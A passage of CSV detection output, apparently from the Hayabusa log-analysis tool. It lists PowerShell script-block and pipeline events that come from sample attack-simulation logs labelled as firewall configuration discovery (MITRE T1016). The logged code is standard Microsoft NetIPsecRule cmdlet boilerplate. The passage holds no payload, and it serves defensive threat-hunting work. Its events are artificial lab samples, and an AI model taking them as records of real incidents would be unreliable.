Log,"ter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { 
__cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('ByIPsecRuleName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Mode') -and (@('ByQuery') 
-contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Mode}) $__cmdletization_queryBuilder.FilterByProperty('Mode', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('InboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${InboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('InboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('OutboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${OutboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('OutboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${QuickModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('QuickModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase2AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase2AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase2AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('KeyModule') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${KeyModule}) $__cmdletization_queryBuilder.FilterByProperty('KeyModule', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowWatchKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowWatchKey}) 
$__cmdletization_queryBuilder.FilterByProperty('AllowWatchKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowSetKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowSetKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowSetKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteTunnelHostname}) $__cmdletization_queryBuilder.FilterByProperty('RemoteTunnelEndpointDNSName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('ForwardPathLifetime') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForwardPathLifetime}) $__cmdletization_queryBuilder.FilterByProperty('MaxReturnPathLifetimeSeconds', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EncryptedTunnelBypass}) $__cmdletization_queryBuilder.FilterByProperty('BypassTunnelIfEncrypted', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RequireAuthorization') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RequireAuthorization}) $__cmdletization_queryBuilder.FilterByProperty('RequireAuthorization', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('User') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${User}) $__cmdletization_queryBuilder.FilterByProperty('Users', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Machine') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Machine}) $__cmdletization_queryBuilder.FilterByProperty('Machines', 
$__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetConSecRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetConSecRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName 
)) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetConSecRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetConSecRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetConSecRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase2AuthSet') -and (@('ByAssociatedNetIPsecPhase2AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase2AuthSet}, 'MSFT_NetConSecRuleEMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetConSecRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeCryptoSet') -and (@('ByAssociatedNetIPsecQuickModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeCryptoSet}, 'MSFT_NetConSecRuleQMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBo",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.770 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"undParameters.ContainsKey('PolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewPolicyStore')) { [object]$__cmdletization_value = ${NewPolicyStore} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewGPOSession')) { [object]$__cmdletization_value = ${NewGPOSession} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; 
Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('CloneObject', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, 
$__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.786 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Copy-NetIPsecRule""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.786 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Enable-NetIPsecRule""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.786 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): 
name=""Function""; value=""Disable-NetIPsecRule""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.786 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Sync-NetIPsecRule""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.786 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Update-NetIPsecRule""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.786 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Enable-NetIPsecRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] param( [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, 
[Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode[]] ${Mode}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecIn')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${InboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecOut')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${OutboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase2AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule[]] ${KeyModule}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowWatchKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowSetKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${ForwardPathLifetime}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${RequireAuthorization}, 
[Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${User}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Machine}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] 
[PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase2AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] 